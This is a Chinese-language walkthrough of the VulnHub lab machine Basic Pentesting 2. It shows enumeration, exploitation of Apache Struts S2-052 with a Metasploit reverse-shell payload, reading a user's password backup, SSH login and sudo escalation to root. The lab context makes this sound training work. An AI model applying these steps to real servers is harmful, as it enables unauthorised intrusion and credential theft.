Basic-pentesting2靶机渗透

前言

这篇靶机属于普通难度吧,主要是坑有点多,再加上之前没有碰过tomcat,所以有些难度,但是还好解决了,所需的时间也不多

下载地址

https://www.vulnhub.com/entry/basic-pentesting-2,241/

信息收集

国际惯例,先来扫描一下这个服务器开放了什么服务

可以看到有sshapache这两个服务,打开网站看看有什么东西

很简陋…查看源代码没有发现什么隐藏的东西,所以这里先用burpsuite来枚举子目录,看看有没有其他的目录

找到了一个名字为development的目录,里面有两个txt文件,依次打开来看看


图二的内容大致是说,shadow存在弱口令之类的,为了防止爆破,请尽快更改,但是我尝试了一下使用工具去爆破,得不到结果,也许是我字典太垃圾了,不管,看图一,图一的意思是说,他最近一直在弄一个struts的东西,然后因为之前的版本都有问题,所以使用的版本是2.5.12,REST那一块不知道怎么翻译,就是tomcat功能的一个插件吧。在上面nmap扫描中看到了有8080和8009这两个端口,确定是tomcat,先访问8080查看

google搜索struts REST version 2.5.12后,看到了相应的漏洞S2-052,先尝试一下有没有这个路径,输入链接http://192.168.1.109:8080/struts2-rest-showcase-2.5.12/后,看到以下内容,说明存在漏洞

这里要注意的是,网络上的教程,路径都是/struts2-rest-showcase,而这个靶机的路径后面多了-2.5.12,我是想起版本号后尝试性的加进去才成功的

S2-052漏洞利用

在github上找到了利用模块后,导入到metasploit中

msf exploit(e) > show options

Module options (exploit/e):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.109                    yes       The target address
   RPORT      8080                             yes       The target port (TCP)
   SRVHOST    0.0.0.0                          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                             yes       The local port to listen on.
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase-2.5.12/orders/3  yes       Path to Struts app
   URIPATH                                     no        The URI to use for this exploit (default is random)
   VHOST                                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.201    yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Apache Struts 2.5 - 2.5.12

exploit后,成功得到shell

meterpreter > shell
id
Process 1422 created.
Channel 1 created.
uid=999(tomcat9) gid=999(tomcat9) groups=999(tomcat9)

这样就算是利用成功了,接下来就是提权了,因为权限太低,所以进入不了root目录

tomcat9@basic2:/home/kay$ ls -al
ls -al
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23 15:38 .
drwxr-xr-x 4 root root 4096 Apr 19 13:50 ..
-rw------- 1 kay  kay   756 Apr 23 16:06 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17 12:59 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17 12:59 .bashrc
drwx------ 2 kay  kay  4096 Apr 17 13:05 .cache
-rw------- 1 root kay   119 Apr 23 15:38 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23 14:50 .nano
-rw------- 1 kay  kay    57 Apr 23 15:08 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17 12:59 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23 15:05 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17 13:05 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23 15:32 .viminfo
tomcat9@basic2:/home/kay$

进入用户kay的目录后,看到了pass.bak文件,由于tomcat用户是没有cat的权限的,所以这里有个小技巧,可以利用vim来只读该文件

tomcat9@basic2:/home/kay$ vim pass.bak

文件内容就是密码了,这比我的密码复杂多了。佩服佩服

知道了kay的密码后,接下来用ssh的方式来登录kay就好了

root@Elapse:~# ssh kay@192.168.1.109
The authenticity of host '192.168.1.109 (192.168.1.109)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.109' (ECDSA) to the list of known hosts.
kay@192.168.1.109's password: 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$

ls -al可以看到目录有个.sudo_as_admin_successful的文件,说明可以直接用自己的密码切换到root用户

kay@basic2:~$ sudo su
[sudo] password for kay: 
root@basic2:/home/kay#

成功,接下来cat /root/flag.txt就好了

文章目录
  1. 1. 前言
  2. 2. 下载地址
  3. 3. 信息收集
  4. 4. S2-052漏洞利用
,